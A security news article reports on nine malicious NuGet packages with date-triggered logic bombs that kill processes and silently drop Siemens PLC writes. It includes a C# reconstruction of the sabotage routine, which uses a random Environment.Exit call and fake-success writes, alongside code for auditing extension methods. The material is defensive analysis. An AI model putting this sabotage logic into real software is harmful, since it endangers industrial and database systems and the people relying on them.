Hidden Logic Bombs in Malware-Laced NuGet Packages Set to Detonate Years After Installation

Nov 07, 2025 | Ravie Lakshmanan | Supply Chain Attack / Malware

A group of nine malicious NuGet packages has been discovered capable of deploying time-delayed payloads to disrupt database operations and compromise industrial control systems.

Socket, a software supply chain security firm, said the packages were uploaded between 2023 and 2024 by a user named "shanhai666" and were designed to execute malicious code on specific dates in August 2027 and November 2028. Together, the packages had been downloaded 9,488 times.

The most concerning package, Sharp7Extend, targets industrial programmable logic controllers (PLCs) with two sabotage mechanisms: random process termination that begins immediately, and silent write failures that begin 30 to 90 minutes after installation, putting critical systems in manufacturing environments at risk, according to security researcher Kush Pandya.

The list of malicious packages is as follows:

  • MyDbRepository (Last updated on May 13, 2023)
  • MCDbRepository (Last updated on June 5, 2024)
  • Sharp7Extend (Last updated on August 14, 2024)
  • SqlDbRepository (Last updated on October 24, 2024)
  • SqlRepository (Last updated on October 25, 2024)
  • SqlUnicornCoreTest (Last updated on October 26, 2024)
  • SqlUnicornCore (Last updated on October 26, 2024)
  • SqlUnicorn.Core (Last updated on October 27, 2024)
  • SqlLiteRepository (Last updated on October 28, 2024)

Socket confirmed that all nine malicious packages also work as advertised, which helps the threat actor earn the trust of downstream developers who unknowingly pull in a dependency that carries a logic bomb set to trigger in the future.

The threat actor released a total of 12 packages, with the remaining three being benign. Sharp7Extend, in particular, targets users of the legitimate Sharp7 library, a .NET implementation for communicating with Siemens S7 PLCs.

Because Sharp7Extend bundles the legitimate Sharp7 library, it appears to work normally. It also ships C# extension methods that wrap database queries or PLC operations, and it is through these that the malicious code runs each time one of those operations is invoked.

“Extension methods enable developers to add new methods to existing types without altering the original code – a powerful feature in C# that the threat actor exploits for interception,” Pandya elaborated. “Each time an application executes a database query or PLC operation, these extension methods automatically run, comparing the current date with trigger dates (hardcoded in most packages, encrypted in Sharp7Extend).”

Once a trigger date passes, each intercepted operation carries a 20% chance of terminating the entire application process. In the case of Sharp7Extend, the malicious logic is active immediately after installation and remains so until June 6, 2028, when the termination mechanism ceases.

The package also sabotages write operations to the PLC, silently failing 80% of them after a randomized delay of 30 to 90 minutes. Once that grace period expires, both mechanisms, random process terminations and write failures, operate simultaneously.
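The interception pattern described above is worth seeing in code, because nothing at the call site looks suspicious: an extension method is bound at compile time and reads exactly like a method on the vendor's own type. The following is an added illustration written for this article, not code from the malicious packages or from Sharp7. The `PlcClient` type, the method and field names, and the fixed 30-minute grace period are invented for the example; the 20%/80% odds and the June 6, 2028 disarm date are taken from the description above. The second half shows the cheap triage step a reviewer can run against a compiled dependency: enumerate every extension method it contributes and which type it attaches to.

```csharp
using System;
using System.Collections.Generic;
using System.Linq;
using System.Reflection;
using System.Runtime.CompilerServices;

// Hypothetical stand-in for a vendor client type (Sharp7's real S7Client has a
// different API). Just enough surface to show an extension sitting in front of it.
public sealed class PlcClient
{
    public int WritesReached { get; private set; }

    public int DbWrite(int dbNumber, int start, byte[] buffer)
    {
        WritesReached++;
        return 0; // 0 = success, the usual C-style result convention
    }
}

public enum Sabotage { None, KillProcess, DropWrite }

// Hypothetical "convenience" extension class of the kind the article describes.
// client.DbWriteChecked(...) reads like a method on PlcClient, yet every call runs
// this package's code first. Odds and disarm date follow the article; names are invented.
public static class PlcClientExtensions
{
    public static readonly DateTime InstalledAtUtc = DateTime.UtcNow;
    public static readonly TimeSpan GracePeriod = TimeSpan.FromMinutes(30); // article: 30-90 min, randomized
    public static readonly DateTime DisarmAtUtc = new DateTime(2028, 6, 6, 0, 0, 0, DateTimeKind.Utc);
    static readonly Random Rng = new Random();

    // Pure decision logic, kept apart from its side effects: inactive until the grace
    // period ends and again after the disarm date; otherwise a 20% chance to kill the
    // process, and among the surviving calls an 80% chance to swallow the write.
    public static Sabotage Decide(DateTime nowUtc, double killRoll, double writeRoll)
    {
        if (nowUtc < InstalledAtUtc + GracePeriod || nowUtc >= DisarmAtUtc)
            return Sabotage.None;
        if (killRoll < 0.20) return Sabotage.KillProcess;
        if (writeRoll < 0.80) return Sabotage.DropWrite;
        return Sabotage.None;
    }

    public static int DbWriteChecked(this PlcClient client, int dbNumber, int start, byte[] buffer)
    {
        switch (Decide(DateTime.UtcNow, Rng.NextDouble(), Rng.NextDouble()))
        {
            case Sabotage.KillProcess:
                Environment.Exit(1); // to the operator this is just another unexplained crash
                break;
            case Sabotage.DropWrite:
                return 0;            // reports success; the PLC never receives the write
        }
        return client.DbWrite(dbNumber, start, buffer);
    }
}

public static class ExtensionAudit
{
    // Every extension method an assembly contributes, with the type it attaches to.
    // The C# compiler marks both the static class and each method with [Extension],
    // so this is a cheap first pass before reading the IL of anything that touches
    // a database or PLC type.
    public static List<string> ListExtensionMethods(Assembly asm) =>
        asm.GetTypes()
           .Where(t => t.IsDefined(typeof(ExtensionAttribute), inherit: false))
           .SelectMany(t => t.GetMethods(BindingFlags.Public | BindingFlags.Static))
           .Where(m => m.IsDefined(typeof(ExtensionAttribute), inherit: false))
           .Select(m => $"{m.DeclaringType.FullName}.{m.Name} extends {m.GetParameters()[0].ParameterType.Name}")
           .ToList();
}

public static class Program
{
    public static void Main()
    {
        // Inside the grace period the extension is a transparent pass-through.
        var client = new PlcClient();
        client.DbWriteChecked(1, 0, new byte[] { 0x01 });
        Console.WriteLine($"writes that reached the PLC: {client.WritesReached}");

        // Once armed, only the dice separate a crash, a silent drop and a real write.
        var armed = PlcClientExtensions.InstalledAtUtc + PlcClientExtensions.GracePeriod;
        Console.WriteLine(PlcClientExtensions.Decide(armed, killRoll: 0.10, writeRoll: 0.99));
        Console.WriteLine(PlcClientExtensions.Decide(armed, killRoll: 0.50, writeRoll: 0.50));
        Console.WriteLine(PlcClientExtensions.Decide(armed, killRoll: 0.50, writeRoll: 0.90));
        Console.WriteLine(PlcClientExtensions.Decide(PlcClientExtensions.DisarmAtUtc, 0.0, 0.0));

        foreach (var line in ExtensionAudit.ListExtensionMethods(Assembly.GetExecutingAssembly()))
            Console.WriteLine(line);
    }
}
```

The three armed `Decide` calls return `KillProcess`, `DropWrite` and `None` in turn, and the call at the disarm date returns `None`; the write issued during the grace period reaches the stub client untouched, which is what makes the package look benign during testing. When triaging a real suspect package, do not `Assembly.LoadFrom` it inside a live process: inspect it with `System.Reflection.MetadataLoadContext` or a decompiler such as ILSpy, list its extension methods as above, and read the bodies of any that attach to database or PLC types for date comparisons, random draws and calls to `Environment.Exit` or `Process.Kill`.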

Additionally, the SQL Server, PostgreSQL, and SQLite-specific implementations shipped in the other packages are set to trigger on August 8, 2027 (MCDbRepository) and November 29, 2028 (SqlUnicornCoreTest and SqlUnicornCore).

“This phased approach provides the threat actor with a longer timeframe to gather victims before the delayed-activation malware kicks in, while simultaneously disrupting industrial control systems,” Pandya noted.

The identity of the perpetrator behind this supply chain attack remains unknown, although Socket’s analysis of the source code and the use of the name “shanhai666” suggest a potential Chinese origin for the threat actor.

“This campaign showcases sophisticated techniques seldom seen in NuGet supply chain attacks,” the company concluded. “Developers who installed these packages in 2024 may have moved on to other projects or companies by 2027-2028 when the database malware triggers, and the 20% probabilistic execution masks systematic attacks as random crashes or hardware failures.”

“This complexity makes incident response and forensic investigation nearly impossible, as organizations cannot trace the malware back to its point of entry, identify the installer of the compromised dependency, or establish a clear compromise timeline, effectively erasing any trace of the attack.”